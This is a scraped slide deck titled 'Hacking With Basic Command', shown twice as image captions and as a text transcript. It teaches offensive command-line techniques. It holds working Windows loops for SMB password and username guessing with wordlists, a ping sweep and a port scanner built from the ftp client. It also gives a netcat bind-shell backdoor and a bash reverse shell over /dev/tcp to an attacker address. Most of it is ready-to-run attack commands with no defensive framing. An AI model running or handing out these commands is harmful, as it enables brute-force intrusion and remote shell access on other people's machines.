![Hacking With Basic Command
Presented :
Dedi Dwianto
[theday@echo.or.id]](https://image.slidesharecdn.com/amrapalibuildershackingwithbasiccommand-140425145543-phpapp02/85/amrapali-builders-hacking-with-basic-command-pdf-1-320.jpg)
![Setting up smb sessions
• Set up session with a target
• Mount a Share on a target :
C:> net use [targetIP] [password] /u:[user]
C:> net use [targetIP][sharename] [password] /u:[user]](https://image.slidesharecdn.com/amrapalibuildershackingwithbasiccommand-140425145543-phpapp02/85/amrapali-builders-hacking-with-basic-command-pdf-6-320.jpg)
![Dropping smb sessions
• Windows only accept one username at a time only
• Drop SMB Session
• Drop All SMB Session
C:> net use [TargetIP] /del
C:> net use * /del](https://image.slidesharecdn.com/amrapalibuildershackingwithbasiccommand-140425145543-phpapp02/85/amrapali-builders-hacking-with-basic-command-pdf-7-320.jpg)
![FOR /L Loops
• FOR /L loops are counters :
• Simple Counter
c:> for /L %i in (1,1,255) do echo %i
c:> for /L %i in ([start],[step],[stop]) do [command]](https://image.slidesharecdn.com/amrapalibuildershackingwithbasiccommand-140425145543-phpapp02/85/amrapali-builders-hacking-with-basic-command-pdf-9-320.jpg)
![FOR /L Loops
• Run Multiple Command
[command1] & [command2]
• Run Command1 and Run Command2 if Command1 run without
error
[command1] && [command2]
c:> for /L %i in (1,1,10) do echo %i & ping –n 5 127.0.0.1
C:> for /L %i in (1,1,10) do echo %ii && ping –n 5 127.0.0.1](https://image.slidesharecdn.com/amrapalibuildershackingwithbasiccommand-140425145543-phpapp02/85/amrapali-builders-hacking-with-basic-command-pdf-10-320.jpg)
![FOR /L Loops : Handling Output
• Redirect to nul : > null
• Redirect to file : >filename
• Output find string : | find “[string name]”
• Redirect Error Message : [command] 2>null or [command] 2>>file
c:> for /L %i in (1,1,10) do echo %i & ping –n 5 127.0.0.1 > nul
C:> for /L %i in (1,1,10) do echo %i && ping –n 5 127.0.0.1 > result.txt](https://image.slidesharecdn.com/amrapalibuildershackingwithbasiccommand-140425145543-phpapp02/85/amrapali-builders-hacking-with-basic-command-pdf-11-320.jpg)
![FOR /F Loops
• Loop through text
• etc can be :
– The contents
– String
– Command
FOR /F ["options"] %parameter IN (“etc") DO command](https://image.slidesharecdn.com/amrapalibuildershackingwithbasiccommand-140425145543-phpapp02/85/amrapali-builders-hacking-with-basic-command-pdf-13-320.jpg)
![Password Guessing with FOR /F
• Password Guessing via SMB
• You know Username
• Password list from John the Ripper’s password.lst
C:>for /F %i in (password.lst) do @echo %i & @net use [targetIP] %i /u:[Username]
2>nul && pause && echo [Username] :%i >> done.txt](https://image.slidesharecdn.com/amrapalibuildershackingwithbasiccommand-140425145543-phpapp02/85/amrapali-builders-hacking-with-basic-command-pdf-14-320.jpg)
![Username & Password
Guessing
with FOR /F• Guees each password for each username
• We need 2 file username & password list
• 2 variable %u and %p for username & password
• Use net use for try SMB session
• Drop SMB if success Login
C:>for /F %u in (user.txt) do @(for /F %p in (password.txt) do @echo %u : %p &
@net use [targetIP] %p /u:%u 2>nul && echo %u : %p >> done.txt &&
net use [targetIP] /del)](https://image.slidesharecdn.com/amrapalibuildershackingwithbasiccommand-140425145543-phpapp02/85/amrapali-builders-hacking-with-basic-command-pdf-16-320.jpg)
![Windows Port Scanner With FTP Client
• Windows FTP Client C:> ftp [IpAddress]
• Using –s option FTP for ready from file : c:>ftp –s:[filename]
• We’ll write a loop that generate FTP command file and invoke FTP
to run from that command
• Store the result
for/L %i in (1,1,1024) do echo Checking Port %i: >> ports.txt
& echo open [IPAddress] %i > ftp.txt & echo quit >> ftp.txt
& ftp -s:ftp.txt 2>>ports.txt](https://image.slidesharecdn.com/amrapalibuildershackingwithbasiccommand-140425145543-phpapp02/85/amrapali-builders-hacking-with-basic-command-pdf-18-320.jpg)
![Windows Command Line File Transfer
• Use Windows File & Printer Sharing
• Redirect to Share folder :
• Login to SMB Session take from Password Guessing
C:>type [filename] > [IPtarget][share][filename]
C:> net use [IPTarget] [password] /u:[username]](https://image.slidesharecdn.com/amrapalibuildershackingwithbasiccommand-140425145543-phpapp02/85/amrapali-builders-hacking-with-basic-command-pdf-20-320.jpg)
![Netcat : Windows Backdoor
nc -l -p [port] -e “cmd.exe”](https://image.slidesharecdn.com/amrapalibuildershackingwithbasiccommand-140425145543-phpapp02/85/amrapali-builders-hacking-with-basic-command-pdf-24-320.jpg)
![Linux Command Line
Hacking• /dev/tcp/
• Open Connection to Other Machines
• Like Connect Back Shell
• /dev/tcp/[IPAddress]/[Port]](https://image.slidesharecdn.com/amrapalibuildershackingwithbasiccommand-140425145543-phpapp02/85/amrapali-builders-hacking-with-basic-command-pdf-25-320.jpg)
![Backdooring via /dev/tcp
/bin/bash -i > /dev/tcp/[IP Attacker]/[port] 0<&1 2>&1
Firewall
Deny
Incoming
/bin/bash -i > /dev/tcp/[ip]/[port] 0<&1
2>&1nc -l -p 80
Type Command Command Execute](https://image.slidesharecdn.com/amrapalibuildershackingwithbasiccommand-140425145543-phpapp02/85/amrapali-builders-hacking-with-basic-command-pdf-26-320.jpg)
amrapali builders @@ hacking with basic command.pdf
- 1. Hacking With Basic Command Presented : Dedi Dwianto [theday@echo.or.id]
- 2. Contents • Scenario • Windows Command-Line Hacking • Netcat • Linux Commnad-Line Hacking • Q&A
- 4. Windows Command • Finding Others Machines • SMB Sessions • FOR Loops • Password Guessing • Port Scanner • File Transfer
- 5. Finding other machines • C:>ipconfig /displaydns • C:>arp –a
- 6. Setting up smb sessions • Set up session with a target • Mount a Share on a target : C:> net use [targetIP] [password] /u:[user] C:> net use [targetIP][sharename] [password] /u:[user]
- 7. Dropping smb sessions • Windows only accept one username at a time only • Drop SMB Session • Drop All SMB Session C:> net use [TargetIP] /del C:> net use * /del
- 8. FOR Loops • Common Option for Hacking • FOR /L : Loop through a range of numbers • FOR /F: Loop through items in a text file
- 9. FOR /L Loops • FOR /L loops are counters : • Simple Counter c:> for /L %i in (1,1,255) do echo %i c:> for /L %i in ([start],[step],[stop]) do [command]
- 10. FOR /L Loops • Run Multiple Command [command1] & [command2] • Run Command1 and Run Command2 if Command1 run without error [command1] && [command2] c:> for /L %i in (1,1,10) do echo %i & ping –n 5 127.0.0.1 C:> for /L %i in (1,1,10) do echo %ii && ping –n 5 127.0.0.1
- 11. FOR /L Loops : Handling Output • Redirect to nul : > null • Redirect to file : >filename • Output find string : | find “[string name]” • Redirect Error Message : [command] 2>null or [command] 2>>file c:> for /L %i in (1,1,10) do echo %i & ping –n 5 127.0.0.1 > nul C:> for /L %i in (1,1,10) do echo %i && ping –n 5 127.0.0.1 > result.txt
- 12. Simple Sweep Ping C:> for /L %i in (1,1,10) do echo %i & ping –n 5 192.168.114.%i | find “Reply”
- 13. FOR /F Loops • Loop through text • etc can be : – The contents – String – Command FOR /F ["options"] %parameter IN (“etc") DO command
- 14. Password Guessing with FOR /F • Password Guessing via SMB • You know Username • Password list from John the Ripper’s password.lst C:>for /F %i in (password.lst) do @echo %i & @net use [targetIP] %i /u:[Username] 2>nul && pause && echo [Username] :%i >> done.txt
- 16. Username & Password Guessing with FOR /F• Guees each password for each username • We need 2 file username & password list • 2 variable %u and %p for username & password • Use net use for try SMB session • Drop SMB if success Login C:>for /F %u in (user.txt) do @(for /F %p in (password.txt) do @echo %u : %p & @net use [targetIP] %p /u:%u 2>nul && echo %u : %p >> done.txt && net use [targetIP] /del)
- 18. Windows Port Scanner With FTP Client • Windows FTP Client C:> ftp [IpAddress] • Using –s option FTP for ready from file : c:>ftp –s:[filename] • We’ll write a loop that generate FTP command file and invoke FTP to run from that command • Store the result for/L %i in (1,1,1024) do echo Checking Port %i: >> ports.txt & echo open [IPAddress] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt 2>>ports.txt
- 20. Windows Command Line File Transfer • Use Windows File & Printer Sharing • Redirect to Share folder : • Login to SMB Session take from Password Guessing C:>type [filename] > [IPtarget][share][filename] C:> net use [IPTarget] [password] /u:[username]
- 22. Netcat • TCP/UDP Network Widget • Standard In and Send It across the network • Receives data from network and put it to standard out NETCAT Std In Std Out Send Packets Receives Packets Std Error SYSTEM NETWORK
- 23. Netcat Functions • Send File • Port Scan • Backdoor Shell Access • Connect to Open Port • Simple Chats • Replay Data in TCP/UDP Packets • Etc …
- 24. Netcat : Windows Backdoor nc -l -p [port] -e “cmd.exe”
- 25. Linux Command Line Hacking• /dev/tcp/ • Open Connection to Other Machines • Like Connect Back Shell • /dev/tcp/[IPAddress]/[Port]
- 26. Backdooring via /dev/tcp /bin/bash -i > /dev/tcp/[IP Attacker]/[port] 0<&1 2>&1 Firewall Deny Incoming /bin/bash -i > /dev/tcp/[ip]/[port] 0<&1 2>&1nc -l -p 80 Type Command Command Execute
- 28. THANK YOU